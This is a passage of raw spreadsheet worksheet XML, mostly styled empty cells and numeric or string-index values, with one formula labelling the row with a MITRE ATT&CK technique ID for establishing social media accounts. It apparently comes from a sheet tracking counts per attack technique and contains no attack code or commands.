      <c r="SW96" s="184"/>
      <c r="SX96" s="184"/>
      <c r="SY96" s="184"/>
      <c r="SZ96" s="184"/>
      <c r="TA96" s="184"/>
      <c r="TB96" s="184"/>
      <c r="TC96" s="184"/>
      <c r="TD96" s="184"/>
      <c r="TE96" s="184"/>
      <c r="TF96" s="184"/>
      <c r="TG96" s="184"/>
      <c r="TH96" s="184"/>
      <c r="TI96" s="184"/>
      <c r="TJ96" s="184"/>
      <c r="TK96" s="184"/>
      <c r="TL96" s="184"/>
      <c r="TM96" s="184"/>
      <c r="TN96" s="184"/>
      <c r="TO96" s="184"/>
      <c r="TP96" s="184"/>
      <c r="TQ96" s="184"/>
      <c r="TR96" s="184"/>
      <c r="TS96" s="184"/>
      <c r="TT96" s="184"/>
      <c r="TU96" s="184"/>
      <c r="TV96" s="184"/>
      <c r="TW96" s="184"/>
      <c r="TX96" s="184"/>
      <c r="TY96" s="184"/>
      <c r="TZ96" s="184"/>
      <c r="UA96" s="184"/>
      <c r="UB96" s="184"/>
      <c r="UC96" s="184"/>
      <c r="UD96" s="184"/>
      <c r="UE96" s="184"/>
      <c r="UF96" s="184"/>
      <c r="UG96" s="184"/>
      <c r="UH96" s="184"/>
      <c r="UI96" s="184"/>
      <c r="UJ96" s="184"/>
      <c r="UK96" s="184"/>
      <c r="UL96" s="184"/>
      <c r="UM96" s="184"/>
      <c r="UN96" s="184"/>
      <c r="UO96" s="184"/>
      <c r="UP96" s="184"/>
      <c r="UQ96" s="184"/>
      <c r="UR96" s="184"/>
      <c r="US96" s="184"/>
      <c r="UT96" s="184"/>
      <c r="UU96" s="184"/>
      <c r="UV96" s="184"/>
      <c r="UW96" s="184"/>
      <c r="UX96" s="184"/>
      <c r="UY96" s="184"/>
      <c r="UZ96" s="184"/>
      <c r="VA96" s="184"/>
      <c r="VB96" s="184"/>
      <c r="VC96" s="184"/>
      <c r="VD96" s="184"/>
      <c r="VE96" s="184"/>
      <c r="VF96" s="184"/>
      <c r="VG96" s="184"/>
      <c r="VH96" s="184"/>
      <c r="VI96" s="184"/>
      <c r="VJ96" s="184"/>
      <c r="VK96" s="184"/>
      <c r="VL96" s="184"/>
      <c r="VM96" s="184"/>
      <c r="VN96" s="184"/>
      <c r="VO96" s="184"/>
      <c r="VP96" s="184"/>
      <c r="VQ96" s="184"/>
      <c r="VR96" s="184"/>
      <c r="VS96" s="184"/>
      <c r="VT96" s="184"/>
      <c r="VU96" s="184"/>
      <c r="VV96" s="184"/>
      <c r="VW96" s="184"/>
      <c r="VX96" s="184"/>
      <c r="VY96" s="184"/>
    </row>
    <row r="97" spans="1:597" ht="39.950000000000003" customHeight="1">
      <c r="A97" s="82" t="s">
        <v>146</v>
      </c>
      <c r="B97" s="83" t="s">
        <v>4</v>
      </c>
      <c r="C97" s="94" t="s">
        <v>552</v>
      </c>
      <c r="D97" s="83" t="s">
        <v>149</v>
      </c>
      <c r="E97" s="83">
        <f t="shared" si="5"/>
        <v>65</v>
      </c>
      <c r="F97" s="83" t="s">
        <v>150</v>
      </c>
      <c r="G97" s="83" t="s">
        <v>1590</v>
      </c>
      <c r="H97" s="197" t="s">
        <v>1591</v>
      </c>
      <c r="I97" s="81" t="s">
        <v>1592</v>
      </c>
      <c r="J97" s="85" t="s">
        <v>795</v>
      </c>
      <c r="K97" s="81" t="s">
        <v>1593</v>
      </c>
      <c r="L97" s="81" t="s">
        <v>1594</v>
      </c>
      <c r="M97" s="378" t="s">
        <v>256</v>
      </c>
      <c r="N97" s="74" t="str">
        <f t="shared" si="3"/>
        <v>OK</v>
      </c>
      <c r="O97" s="485" t="str">
        <f t="shared" si="4"/>
        <v>New</v>
      </c>
      <c r="P97" s="91"/>
      <c r="Q97" s="379" t="s">
        <v>8</v>
      </c>
      <c r="R97" s="92" t="s">
        <v>1595</v>
      </c>
      <c r="S97" s="93" t="s">
        <v>799</v>
      </c>
      <c r="T97" s="92" t="s">
        <v>1462</v>
      </c>
      <c r="U97" s="94" t="s">
        <v>4</v>
      </c>
      <c r="V97" s="95" t="s">
        <v>821</v>
      </c>
      <c r="W97" s="96" t="s">
        <v>1596</v>
      </c>
      <c r="X97" s="97" t="s">
        <v>1597</v>
      </c>
      <c r="Y97" s="83" t="s">
        <v>1598</v>
      </c>
      <c r="Z97" s="98" t="s">
        <v>1599</v>
      </c>
      <c r="AA97" s="205" t="s">
        <v>745</v>
      </c>
      <c r="AB97" s="206" t="s">
        <v>745</v>
      </c>
      <c r="AC97" s="386" t="s">
        <v>745</v>
      </c>
      <c r="AD97" s="197"/>
      <c r="AE97" s="197"/>
      <c r="AF97" s="384" t="s">
        <v>745</v>
      </c>
      <c r="AG97" s="88" t="s">
        <v>745</v>
      </c>
      <c r="AH97" s="341" t="s">
        <v>746</v>
      </c>
      <c r="AI97" s="353" t="s">
        <v>756</v>
      </c>
      <c r="AJ97" s="353" t="s">
        <v>747</v>
      </c>
      <c r="AK97" s="354" t="s">
        <v>745</v>
      </c>
      <c r="AL97" s="355" t="s">
        <v>747</v>
      </c>
      <c r="AM97" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AN97" s="355" t="s">
        <v>756</v>
      </c>
      <c r="AO97" s="359" t="s">
        <v>756</v>
      </c>
      <c r="AP97" s="385" t="str">
        <f>M97&amp;"-frag"</f>
        <v>T1585.001-Establish_social_accounts-frag</v>
      </c>
      <c r="AQ97" s="646">
        <v>129</v>
      </c>
      <c r="AR97" s="647"/>
      <c r="AS97" s="647">
        <v>129</v>
      </c>
      <c r="AT97" s="647">
        <v>0</v>
      </c>
      <c r="AU97" s="647">
        <v>129</v>
      </c>
      <c r="AV97" s="650" t="s">
        <v>4</v>
      </c>
      <c r="AW97" s="647">
        <v>1</v>
      </c>
      <c r="AX97" s="647">
        <v>1</v>
      </c>
      <c r="AY97" s="647">
        <v>0</v>
      </c>
      <c r="AZ97" s="647">
        <v>1</v>
      </c>
      <c r="BA97" s="381"/>
      <c r="BB97" s="101">
        <v>1675</v>
      </c>
      <c r="BC97" s="102" t="s">
        <v>2057</v>
      </c>
      <c r="BD97" s="102">
        <v>312</v>
      </c>
      <c r="BE97" s="103" t="s">
        <v>2058</v>
      </c>
      <c r="BF97" s="103">
        <v>6</v>
      </c>
      <c r="BG97" s="104">
        <v>125</v>
      </c>
      <c r="BH97" s="105">
        <v>0</v>
      </c>
      <c r="BI97" s="106">
        <v>0</v>
      </c>
      <c r="BJ97" s="497">
        <v>0</v>
      </c>
      <c r="BK97" s="107">
        <v>0</v>
      </c>
      <c r="BL97" s="107">
        <v>0</v>
      </c>
      <c r="BM97" s="108">
        <v>0</v>
      </c>
      <c r="BN97" s="109">
        <v>1675</v>
      </c>
      <c r="BO97" s="110" t="s">
        <v>2057</v>
      </c>
      <c r="BP97" s="501">
        <v>312</v>
      </c>
      <c r="BQ97" s="111" t="s">
        <v>2058</v>
      </c>
      <c r="BR97" s="111">
        <v>6</v>
      </c>
      <c r="BS97" s="112">
        <v>125</v>
      </c>
      <c r="BT97" s="113">
        <v>1676</v>
      </c>
      <c r="BU97" s="114" t="s">
        <v>3844</v>
      </c>
      <c r="BV97" s="503">
        <v>312</v>
      </c>
      <c r="BW97" s="115" t="s">
        <v>2058</v>
      </c>
      <c r="BX97" s="115">
        <v>6</v>
      </c>
      <c r="BY97" s="116">
        <v>125</v>
      </c>
      <c r="BZ97" s="250">
        <v>3</v>
      </c>
      <c r="CA97" s="251" t="s">
        <v>1921</v>
      </c>
      <c r="CB97" s="505">
        <v>3</v>
      </c>
      <c r="CC97" s="252" t="s">
        <v>1910</v>
      </c>
      <c r="CD97" s="252">
        <v>1</v>
      </c>
      <c r="CE97" s="253">
        <v>3</v>
      </c>
      <c r="CF97" s="101">
        <v>1679</v>
      </c>
      <c r="CG97" s="102" t="s">
        <v>3845</v>
      </c>
      <c r="CH97" s="102">
        <v>315</v>
      </c>
      <c r="CI97" s="103" t="s">
        <v>3846</v>
      </c>
      <c r="CJ97" s="103">
        <v>7</v>
      </c>
      <c r="CK97" s="104">
        <v>125</v>
      </c>
      <c r="CL97" s="105">
        <v>0</v>
      </c>
      <c r="CM97" s="106">
        <v>0</v>
      </c>
      <c r="CN97" s="497">
        <v>0</v>
      </c>
      <c r="CO97" s="107">
        <v>0</v>
      </c>
      <c r="CP97" s="107">
        <v>0</v>
      </c>
      <c r="CQ97" s="108">
        <v>0</v>
      </c>
      <c r="CR97" s="109">
        <v>0</v>
      </c>
      <c r="CS97" s="110">
        <v>0</v>
      </c>
      <c r="CT97" s="501">
        <v>0</v>
      </c>
      <c r="CU97" s="111">
        <v>0</v>
      </c>
      <c r="CV97" s="111">
        <v>0</v>
      </c>
      <c r="CW97" s="112">
        <v>0</v>
      </c>
      <c r="CX97" s="113">
        <v>1675</v>
      </c>
      <c r="CY97" s="114" t="s">
        <v>2057</v>
      </c>
      <c r="CZ97" s="503">
        <v>312</v>
      </c>
      <c r="DA97" s="115" t="s">
        <v>2058</v>
      </c>
      <c r="DB97" s="115">
        <v>6</v>
      </c>
      <c r="DC97" s="116">
        <v>125</v>
      </c>
      <c r="DD97" s="101">
        <v>0</v>
      </c>
      <c r="DE97" s="102">
        <v>0</v>
      </c>
      <c r="DF97" s="102">
        <v>0</v>
      </c>
      <c r="DG97" s="103">
        <v>0</v>
      </c>
      <c r="DH97" s="103">
        <v>0</v>
      </c>
      <c r="DI97" s="104">
        <v>0</v>
      </c>
      <c r="DJ97" s="105">
        <v>0</v>
      </c>
      <c r="DK97" s="106">
        <v>0</v>
      </c>
      <c r="DL97" s="497">
        <v>0</v>
      </c>
      <c r="DM97" s="107">
        <v>0</v>
      </c>
      <c r="DN97" s="107">
        <v>0</v>
      </c>
      <c r="DO97" s="108">
        <v>0</v>
      </c>
      <c r="DP97" s="109">
        <v>0</v>
      </c>
      <c r="DQ97" s="110">
        <v>0</v>
      </c>
      <c r="DR97" s="501">
        <v>0</v>
      </c>
      <c r="DS97" s="111">
        <v>0</v>
      </c>
      <c r="DT97" s="111">
        <v>0</v>
      </c>
      <c r="DU97" s="112">
        <v>0</v>
      </c>
      <c r="DV97" s="113">
        <v>0</v>
      </c>
      <c r="DW97" s="114">
        <v>0</v>
      </c>
      <c r="DX97" s="503">
        <v>0</v>
      </c>
      <c r="DY97" s="115">
        <v>0</v>
      </c>
      <c r="DZ97" s="115">
        <v>0</v>
      </c>
      <c r="EA97" s="116">
        <v>0</v>
      </c>
      <c r="EB97" s="250">
        <v>0</v>
      </c>
      <c r="EC97" s="251">
        <v>0</v>
      </c>
      <c r="ED97" s="505">
        <v>0</v>
      </c>
      <c r="EE97" s="252">
        <v>0</v>
      </c>
      <c r="EF97" s="252">
        <v>0</v>
      </c>
      <c r="EG97" s="253">
        <v>0</v>
      </c>
      <c r="EH97" s="101">
        <v>0</v>
      </c>
      <c r="EI97" s="102">
        <v>0</v>
      </c>
      <c r="EJ97" s="102">
        <v>0</v>
      </c>
      <c r="EK97" s="103">
        <v>0</v>
      </c>
      <c r="EL97" s="103">
        <v>0</v>
      </c>
      <c r="EM97" s="104">
        <v>0</v>
      </c>
      <c r="EN97" s="105">
        <v>0</v>
      </c>
      <c r="EO97" s="106">
        <v>0</v>
      </c>
      <c r="EP97" s="497">
        <v>0</v>
      </c>
      <c r="EQ97" s="107">
        <v>0</v>
      </c>
      <c r="ER97" s="107">
        <v>0</v>
      </c>
      <c r="ES97" s="108">
        <v>0</v>
      </c>
      <c r="ET97" s="109">
        <v>0</v>
      </c>
      <c r="EU97" s="110">
        <v>0</v>
      </c>
      <c r="EV97" s="501">
        <v>0</v>
      </c>
      <c r="EW97" s="111">
        <v>0</v>
      </c>
      <c r="EX97" s="111">
        <v>0</v>
      </c>
      <c r="EY97" s="112">
        <v>0</v>
      </c>
      <c r="EZ97" s="113">
        <v>0</v>
      </c>
      <c r="FA97" s="114">
        <v>0</v>
      </c>
      <c r="FB97" s="503">
        <v>0</v>
      </c>
      <c r="FC97" s="115">
        <v>0</v>
      </c>
      <c r="FD97" s="115">
        <v>0</v>
      </c>
      <c r="FE97" s="116">
        <v>0</v>
      </c>
      <c r="FF97" s="101">
        <v>78</v>
      </c>
      <c r="FG97" s="102" t="s">
        <v>3847</v>
      </c>
      <c r="FH97" s="102">
        <v>62</v>
      </c>
      <c r="FI97" s="103" t="s">
        <v>3848</v>
      </c>
      <c r="FJ97" s="103">
        <v>3</v>
      </c>
      <c r="FK97" s="104">
        <v>59</v>
      </c>
      <c r="FL97" s="105">
        <v>0</v>
      </c>
      <c r="FM97" s="106">
        <v>0</v>
      </c>
      <c r="FN97" s="497">
        <v>0</v>
      </c>
      <c r="FO97" s="107">
        <v>0</v>
      </c>
      <c r="FP97" s="107">
        <v>0</v>
      </c>
      <c r="FQ97" s="108">
        <v>0</v>
      </c>
      <c r="FR97" s="109">
        <v>78</v>
      </c>
      <c r="FS97" s="110" t="s">
        <v>3847</v>
      </c>
      <c r="FT97" s="501">
        <v>62</v>
      </c>
      <c r="FU97" s="111" t="s">
        <v>3848</v>
      </c>
      <c r="FV97" s="111">
        <v>3</v>
      </c>
      <c r="FW97" s="112">
        <v>59</v>
      </c>
      <c r="FX97" s="113">
        <v>78</v>
      </c>
      <c r="FY97" s="114" t="s">
        <v>3847</v>
      </c>
      <c r="FZ97" s="503">
        <v>62</v>
      </c>
      <c r="GA97" s="115" t="s">
        <v>3848</v>
      </c>
      <c r="GB97" s="115">
        <v>3</v>
      </c>
      <c r="GC97" s="116">
        <v>59</v>
      </c>
      <c r="GD97" s="250">
        <v>3</v>
      </c>
      <c r="GE97" s="251" t="s">
        <v>1921</v>
      </c>
      <c r="GF97" s="505">
        <v>3</v>
      </c>
      <c r="GG97" s="252" t="s">
        <v>1910</v>
      </c>
      <c r="GH97" s="252">
        <v>1</v>
      </c>
      <c r="GI97" s="253">
        <v>3</v>
      </c>
      <c r="GJ97" s="101">
        <v>81</v>
      </c>
      <c r="GK97" s="102" t="s">
        <v>3849</v>
      </c>
      <c r="GL97" s="102">
        <v>65</v>
      </c>
      <c r="GM97" s="103" t="s">
        <v>3850</v>
      </c>
      <c r="GN97" s="103">
        <v>4</v>
      </c>
      <c r="GO97" s="104">
        <v>59</v>
      </c>
      <c r="GP97" s="105">
        <v>0</v>
      </c>
      <c r="GQ97" s="106">
        <v>0</v>
      </c>
      <c r="GR97" s="497">
        <v>0</v>
      </c>
      <c r="GS97" s="107">
        <v>0</v>
      </c>
      <c r="GT97" s="107">
        <v>0</v>
      </c>
      <c r="GU97" s="108">
        <v>0</v>
      </c>
      <c r="GV97" s="109">
        <v>0</v>
      </c>
      <c r="GW97" s="110">
        <v>0</v>
      </c>
      <c r="GX97" s="501">
        <v>0</v>
      </c>
      <c r="GY97" s="111">
        <v>0</v>
      </c>
      <c r="GZ97" s="111">
        <v>0</v>
      </c>
      <c r="HA97" s="112">
        <v>0</v>
      </c>
      <c r="HB97" s="113">
        <v>78</v>
      </c>
      <c r="HC97" s="114" t="s">
        <v>3847</v>
      </c>
      <c r="HD97" s="503">
        <v>62</v>
      </c>
      <c r="HE97" s="115" t="s">
        <v>3848</v>
      </c>
      <c r="HF97" s="115">
        <v>3</v>
      </c>
      <c r="HG97" s="116">
        <v>59</v>
      </c>
      <c r="HH97" s="101">
        <v>1597</v>
      </c>
      <c r="HI97" s="102" t="s">
        <v>3851</v>
      </c>
      <c r="HJ97" s="102">
        <v>250</v>
      </c>
      <c r="HK97" s="103" t="s">
        <v>3264</v>
      </c>
      <c r="HL97" s="103">
        <v>3</v>
      </c>
      <c r="HM97" s="104">
        <v>125</v>
      </c>
      <c r="HN97" s="105">
        <v>0</v>
      </c>
      <c r="HO97" s="106">
        <v>0</v>
      </c>
      <c r="HP97" s="497">
        <v>0</v>
      </c>
      <c r="HQ97" s="107">
        <v>0</v>
      </c>
      <c r="HR97" s="107">
        <v>0</v>
      </c>
      <c r="HS97" s="108">
        <v>0</v>
      </c>
      <c r="HT97" s="109">
        <v>1597</v>
      </c>
      <c r="HU97" s="110" t="s">
        <v>3851</v>
      </c>
      <c r="HV97" s="501">
        <v>250</v>
      </c>
      <c r="HW97" s="111" t="s">
        <v>3264</v>
      </c>
      <c r="HX97" s="111">
        <v>3</v>
      </c>
      <c r="HY97" s="112">
        <v>125</v>
      </c>
      <c r="HZ97" s="113">
        <v>1598</v>
      </c>
      <c r="IA97" s="114" t="s">
        <v>3852</v>
      </c>
      <c r="IB97" s="503">
        <v>250</v>
      </c>
      <c r="IC97" s="115" t="s">
        <v>3264</v>
      </c>
      <c r="ID97" s="115">
        <v>3</v>
      </c>
      <c r="IE97" s="116">
        <v>125</v>
      </c>
      <c r="IF97" s="250">
        <v>0</v>
      </c>
      <c r="IG97" s="251">
        <v>0</v>
      </c>
      <c r="IH97" s="505">
        <v>0</v>
      </c>
      <c r="II97" s="252">
        <v>0</v>
      </c>
      <c r="IJ97" s="252">
        <v>0</v>
      </c>
      <c r="IK97" s="253">
        <v>0</v>
      </c>
      <c r="IL97" s="101">
        <v>1598</v>
      </c>
      <c r="IM97" s="102" t="s">
        <v>3852</v>
      </c>
      <c r="IN97" s="102">
        <v>250</v>
      </c>
      <c r="IO97" s="103" t="s">
        <v>3264</v>
      </c>
      <c r="IP97" s="103">
        <v>3</v>
      </c>
      <c r="IQ97" s="104">
        <v>125</v>
      </c>
      <c r="IR97" s="105">
        <v>0</v>
      </c>
      <c r="IS97" s="106">
        <v>0</v>
      </c>
      <c r="IT97" s="497">
        <v>0</v>
      </c>
      <c r="IU97" s="107">
        <v>0</v>
      </c>
      <c r="IV97" s="107">
        <v>0</v>
      </c>
      <c r="IW97" s="108">
        <v>0</v>
      </c>
      <c r="IX97" s="109">
        <v>0</v>
      </c>
      <c r="IY97" s="110">
        <v>0</v>
      </c>
      <c r="IZ97" s="501">
        <v>0</v>
      </c>
      <c r="JA97" s="111">
        <v>0</v>
      </c>
      <c r="JB97" s="111">
        <v>0</v>
      </c>
      <c r="JC97" s="112">
        <v>0</v>
      </c>
      <c r="JD97" s="113">
        <v>1597</v>
      </c>
      <c r="JE97" s="114" t="s">
        <v>3851</v>
      </c>
      <c r="JF97" s="503">
        <v>250</v>
      </c>
      <c r="JG97" s="115" t="s">
        <v>3264</v>
      </c>
      <c r="JH97" s="115">
        <v>3</v>
      </c>
      <c r="JI97" s="116">
        <v>125</v>
      </c>
      <c r="JJ97" s="101">
        <v>0</v>
      </c>
      <c r="JK97" s="102">
        <v>0</v>
      </c>
      <c r="JL97" s="102">
        <v>0</v>
      </c>
      <c r="JM97" s="103">
        <v>0</v>
      </c>
      <c r="JN97" s="103">
        <v>0</v>
      </c>
      <c r="JO97" s="104">
        <v>0</v>
      </c>
      <c r="JP97" s="105">
        <v>0</v>
      </c>
      <c r="JQ97" s="106">
        <v>0</v>
      </c>
      <c r="JR97" s="497">
        <v>0</v>
      </c>
      <c r="JS97" s="107">
        <v>0</v>
      </c>
      <c r="JT97" s="107">
        <v>0</v>
      </c>
      <c r="JU97" s="108">
        <v>0</v>
      </c>
      <c r="JV97" s="109">
        <v>0</v>
      </c>
      <c r="JW97" s="110">
        <v>0</v>
      </c>
      <c r="JX97" s="501">
        <v>0</v>
      </c>
      <c r="JY97" s="111">
        <v>0</v>
      </c>
      <c r="JZ97" s="111">
        <v>0</v>
      </c>
      <c r="KA97" s="112">
        <v>0</v>
      </c>
      <c r="KB97" s="113">
        <v>0</v>
      </c>
      <c r="KC97" s="114">
        <v>0</v>
      </c>
      <c r="KD97" s="503">
        <v>0</v>
      </c>
      <c r="KE97" s="115">
        <v>0</v>
      </c>
      <c r="KF97" s="115">
        <v>0</v>
      </c>
      <c r="KG97" s="116">
        <v>0</v>
      </c>
      <c r="KH97" s="250">
        <v>0</v>
      </c>
      <c r="KI97" s="251">
        <v>0</v>
      </c>
      <c r="KJ97" s="505">
        <v>0</v>
      </c>
      <c r="KK97" s="252">
        <v>0</v>
      </c>
      <c r="KL97" s="252">
        <v>0</v>
      </c>
      <c r="KM97" s="253">
        <v>0</v>
      </c>
      <c r="KN97" s="101">
        <v>0</v>
      </c>
      <c r="KO97" s="102">
        <v>0</v>
      </c>
      <c r="KP97" s="102">
        <v>0</v>
      </c>
      <c r="KQ97" s="103">
        <v>0</v>
      </c>
      <c r="KR97" s="103">
        <v>0</v>
      </c>
      <c r="KS97" s="104">
        <v>0</v>
      </c>
      <c r="KT97" s="105">
        <v>0</v>
      </c>
      <c r="KU97" s="106">
        <v>0</v>
      </c>
      <c r="KV97" s="497">
        <v>0</v>
      </c>
      <c r="KW97" s="107">
        <v>0</v>
      </c>
      <c r="KX97" s="107">
        <v>0</v>
      </c>
      <c r="KY97" s="108">
        <v>0</v>
      </c>
      <c r="KZ97" s="109">
        <v>0</v>
      </c>
      <c r="LA97" s="110">
        <v>0</v>
      </c>
      <c r="LB97" s="501">
        <v>0</v>
      </c>
      <c r="LC97" s="111">
        <v>0</v>
      </c>
      <c r="LD97" s="111">
        <v>0</v>
      </c>
      <c r="LE97" s="112">
        <v>0</v>
      </c>
      <c r="LF97" s="113">
        <v>0</v>
      </c>
      <c r="LG97" s="114">
        <v>0</v>
      </c>
      <c r="LH97" s="503">
        <v>0</v>
      </c>
      <c r="LI97" s="115">
        <v>0</v>
      </c>
      <c r="LJ97" s="115">
        <v>0</v>
      </c>
      <c r="LK97" s="116">
        <v>0</v>
      </c>
      <c r="LL97" s="117">
        <v>129</v>
      </c>
      <c r="LM97" s="507">
        <v>129</v>
      </c>
      <c r="LN97" s="119">
        <v>1</v>
      </c>
      <c r="LO97" s="119">
        <v>0</v>
      </c>
      <c r="LP97" s="119">
        <v>129</v>
      </c>
      <c r="LQ97" s="119">
        <v>129</v>
      </c>
      <c r="LR97" s="119">
        <v>0</v>
      </c>
      <c r="LS97" s="119">
        <v>129</v>
      </c>
      <c r="LT97" s="382"/>
      <c r="LU97" s="117">
        <v>0</v>
      </c>
      <c r="LV97" s="118">
        <v>0</v>
      </c>
      <c r="LW97" s="507">
        <v>0</v>
      </c>
      <c r="LX97" s="119">
        <v>0</v>
      </c>
      <c r="LY97" s="119">
        <v>0</v>
      </c>
      <c r="LZ97" s="119">
        <v>0</v>
      </c>
      <c r="MA97" s="117">
        <v>129</v>
      </c>
      <c r="MB97" s="118" t="s">
        <v>4276</v>
      </c>
      <c r="MC97" s="507">
        <v>129</v>
      </c>
      <c r="MD97" s="119" t="s">
        <v>2962</v>
      </c>
      <c r="ME97" s="119">
        <v>1</v>
      </c>
      <c r="MF97" s="119">
        <v>129</v>
      </c>
      <c r="MG97" s="117">
        <v>0</v>
      </c>
      <c r="MH97" s="118">
        <v>0</v>
      </c>
      <c r="MI97" s="507">
        <v>0</v>
      </c>
      <c r="MJ97" s="119">
        <v>0</v>
      </c>
      <c r="MK97" s="119">
        <v>0</v>
      </c>
      <c r="ML97" s="119">
        <v>0</v>
      </c>
      <c r="MM97" s="117">
        <v>0</v>
      </c>
      <c r="MN97" s="118">
        <v>0</v>
      </c>
      <c r="MO97" s="507">
        <v>0</v>
      </c>
      <c r="MP97" s="119">
        <v>0</v>
      </c>
      <c r="MQ97" s="119">
        <v>0</v>
      </c>
      <c r="MR97" s="119">
        <v>0</v>
      </c>
      <c r="MS97" s="117">
        <v>0</v>
      </c>
      <c r="MT97" s="118">
        <v>0</v>
      </c>
      <c r="MU97" s="507">
        <v>0</v>
      </c>
      <c r="MV97" s="119">
        <v>0</v>
      </c>
      <c r="MW97" s="119">
        <v>0</v>
      </c>
      <c r="MX97" s="119">
        <v>0</v>
      </c>
      <c r="MY97" s="117">
        <v>0</v>
      </c>
      <c r="MZ97" s="118">
        <v>0</v>
      </c>
      <c r="NA97" s="507">
        <v>0</v>
      </c>
      <c r="NB97" s="119">
        <v>0</v>
      </c>
      <c r="NC97" s="119">
        <v>0</v>
      </c>
      <c r="ND97" s="119">
        <v>0</v>
      </c>
      <c r="NE97" s="117">
        <v>0</v>
      </c>
      <c r="NF97" s="118">
        <v>0</v>
      </c>
      <c r="NG97" s="507">
        <v>0</v>
      </c>
      <c r="NH97" s="119">
        <v>0</v>
      </c>
      <c r="NI97" s="119">
        <v>0</v>
      </c>
      <c r="NJ97" s="119">
        <v>0</v>
      </c>
      <c r="NK97" s="117">
        <v>0</v>
      </c>
      <c r="NL97" s="118">
        <v>0</v>
      </c>
      <c r="NM97" s="507">
        <v>0</v>
      </c>
      <c r="NN97" s="119">
        <v>0</v>
      </c>
      <c r="NO97" s="119">
        <v>0</v>
      </c>
      <c r="NP97" s="119">
        <v>0</v>
      </c>
      <c r="NQ97" s="117">
        <v>0</v>
      </c>
      <c r="NR97" s="118">
        <v>0</v>
      </c>
      <c r="NS97" s="507">
        <v>0</v>
      </c>
      <c r="NT97" s="119">
        <v>0</v>
      </c>
      <c r="NU97" s="119">
        <v>0</v>
      </c>
      <c r="NV97" s="119">
        <v>0</v>
      </c>
      <c r="NW97" s="117">
        <v>0</v>
      </c>
      <c r="NX97" s="118">
        <v>0</v>
      </c>
      <c r="NY97" s="507">
        <v>0</v>
      </c>
      <c r="NZ97" s="119">
        <v>0</v>
      </c>
      <c r="OA97" s="119">
        <v>0</v>
      </c>
      <c r="OB97" s="119">
        <v>0</v>
      </c>
      <c r="OC97" s="120">
        <v>135</v>
      </c>
      <c r="OD97" s="120">
        <v>135</v>
      </c>
      <c r="OE97" s="120">
        <v>2</v>
      </c>
      <c r="OF97" s="121">
        <v>1</v>
      </c>
      <c r="OG97" s="120">
        <v>124</v>
      </c>
      <c r="OH97" s="120">
        <v>124</v>
      </c>
      <c r="OI97" s="120">
        <v>124</v>
      </c>
      <c r="OJ97" s="120">
        <v>124</v>
      </c>
      <c r="OK97" s="383"/>
      <c r="OL97" s="120">
        <v>135</v>
      </c>
      <c r="OM97" s="120">
        <v>135</v>
      </c>
      <c r="ON97" s="120">
        <v>135</v>
      </c>
      <c r="OO97" s="120" t="s">
        <v>3853</v>
      </c>
      <c r="OP97" s="120">
        <v>2</v>
      </c>
      <c r="OQ97" s="464">
        <v>124</v>
      </c>
      <c r="OR97" s="120">
        <v>0</v>
      </c>
      <c r="OS97" s="120">
        <v>0</v>
      </c>
      <c r="OT97" s="120">
        <v>0</v>
      </c>
      <c r="OU97" s="120"/>
      <c r="OV97" s="120">
        <v>0</v>
      </c>
      <c r="OW97" s="464">
        <v>0</v>
      </c>
      <c r="OX97" s="120">
        <v>0</v>
      </c>
      <c r="OY97" s="120">
        <v>0</v>
      </c>
      <c r="OZ97" s="120">
        <v>0</v>
      </c>
      <c r="PA97" s="120"/>
      <c r="PB97" s="120">
        <v>0</v>
      </c>
      <c r="PC97" s="464">
        <v>0</v>
      </c>
      <c r="PD97" s="120">
        <v>0</v>
      </c>
      <c r="PE97" s="120">
        <v>0</v>
      </c>
      <c r="PF97" s="120">
        <v>0</v>
      </c>
      <c r="PG97" s="120"/>
      <c r="PH97" s="120">
        <v>0</v>
      </c>
      <c r="PI97" s="464">
        <v>0</v>
      </c>
      <c r="PJ97" s="120">
        <v>0</v>
      </c>
      <c r="PK97" s="120">
        <v>0</v>
      </c>
      <c r="PL97" s="120">
        <v>0</v>
      </c>
      <c r="PM97" s="120"/>
      <c r="PN97" s="120">
        <v>0</v>
      </c>
      <c r="PO97" s="464">
        <v>0</v>
      </c>
      <c r="PP97" s="120">
        <v>0</v>
      </c>
      <c r="PQ97" s="120">
        <v>0</v>
      </c>
      <c r="PR97" s="120">
        <v>0</v>
      </c>
      <c r="PS97" s="120"/>
      <c r="PT97" s="120">
        <v>0</v>
      </c>
      <c r="PU97" s="464">
        <v>0</v>
      </c>
      <c r="PV97" s="120">
        <v>0</v>
      </c>
      <c r="PW97" s="120">
        <v>0</v>
      </c>
      <c r="PX97" s="120">
        <v>0</v>
      </c>
      <c r="PY97" s="120"/>
      <c r="PZ97" s="120">
        <v>0</v>
      </c>
      <c r="QA97" s="464">
        <v>0</v>
      </c>
      <c r="QB97" s="120">
        <v>0</v>
      </c>
      <c r="QC97" s="120">
        <v>0</v>
      </c>
      <c r="QD97" s="120">
        <v>0</v>
      </c>
      <c r="QE97" s="120"/>
      <c r="QF97" s="120">
        <v>0</v>
      </c>
      <c r="QG97" s="464">
        <v>0</v>
      </c>
      <c r="QH97" s="120">
        <v>135</v>
      </c>
      <c r="QI97" s="120">
        <v>135</v>
      </c>
      <c r="QJ97" s="120">
        <v>124</v>
      </c>
      <c r="QK97" s="120" t="s">
        <v>2508</v>
      </c>
      <c r="QL97" s="120">
        <v>1</v>
      </c>
      <c r="QM97" s="464">
        <v>124</v>
      </c>
      <c r="QN97" s="120">
        <v>0</v>
      </c>
      <c r="QO97" s="120">
        <v>0</v>
      </c>
      <c r="QP97" s="120">
        <v>0</v>
      </c>
      <c r="QQ97" s="120"/>
      <c r="QR97" s="120">
        <v>0</v>
      </c>
      <c r="QS97" s="464">
        <v>0</v>
      </c>
      <c r="QT97" s="184"/>
      <c r="QU97" s="184"/>
      <c r="QV97" s="184"/>
      <c r="QW97" s="184"/>
      <c r="QX97" s="184"/>
      <c r="QY97" s="184"/>
      <c r="QZ97" s="184"/>
      <c r="RA97" s="184"/>
      <c r="RB97" s="184"/>
      <c r="RC97" s="184"/>
      <c r="RD97" s="184"/>
      <c r="RE97" s="184"/>
      <c r="RF97" s="184"/>
      <c r="RG97" s="184"/>
      <c r="RH97" s="184"/>
      <c r="RI97" s="184"/>
      <c r="RJ97" s="184"/>
      <c r="RK97" s="184"/>
      <c r="RL97" s="184"/>
      <c r="RM97" s="184"/>
      <c r="RN97" s="184"/>
      <c r="RO97" s="184"/>
      <c r="RP97" s="184"/>
      <c r="RQ97" s="184"/>
      <c r="RR97" s="184"/>
      <c r="RS97" s="184"/>
      <c r="RT97" s="184"/>
      <c r="RU97" s="184"/>
